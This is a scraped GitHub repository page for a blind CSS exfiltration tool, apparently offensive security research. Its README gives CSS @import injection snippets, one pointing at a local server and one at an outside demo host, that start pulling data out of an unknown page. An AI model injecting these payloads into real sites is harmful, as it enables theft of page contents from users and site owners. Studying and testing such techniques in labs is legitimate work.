Skip to content

hackvertor/blind-css-exfiltration

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

41 Commits
node_modules
node_modules
 
 
test-webpages
test-webpages
 
 
README.md
README.md
 
 
css-exfiltrator-server.js
css-exfiltrator-server.js
 
 
discover-elements.php
discover-elements.php
 
 
input-count.html
input-count.html
 
 
input-name-value-begins-ends-with.php
input-name-value-begins-ends-with.php
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 
test.html
test.html
 
 

Repository files navigation

Blind CSS Exfiltration

Exfiltrate unknown web pages

Using the exfiltrator

To run your own version of the exfiltrator you need to first grab the source code from above and then run it using node: node css-exfiltrator-server.js

This will start the server. Once the server is started it should be running on localhost:5001 by default. You can change this in the code. To start an exfiltration you simply need to make an @import request to the exfiltrator server:

<style>
@import 'http://localhost:5001/start';    
</style>

Demo

You can get a demo of our exfiltrator using PortSwigger labs. Note you can only exfiltrate once per IP. If more than one person tries to exfiltrate with the same IP the previous session will be deleted. Enjoy!

<style>
@import 'https://portswigger-labs.net/blind-css-exfiltration/start';    
</style>

How it works

I've written a blog post on how the whole process works. You can read it at: Blind CSS Exfiltration

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

80 stars

Watchers

2 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

 
 
 

Languages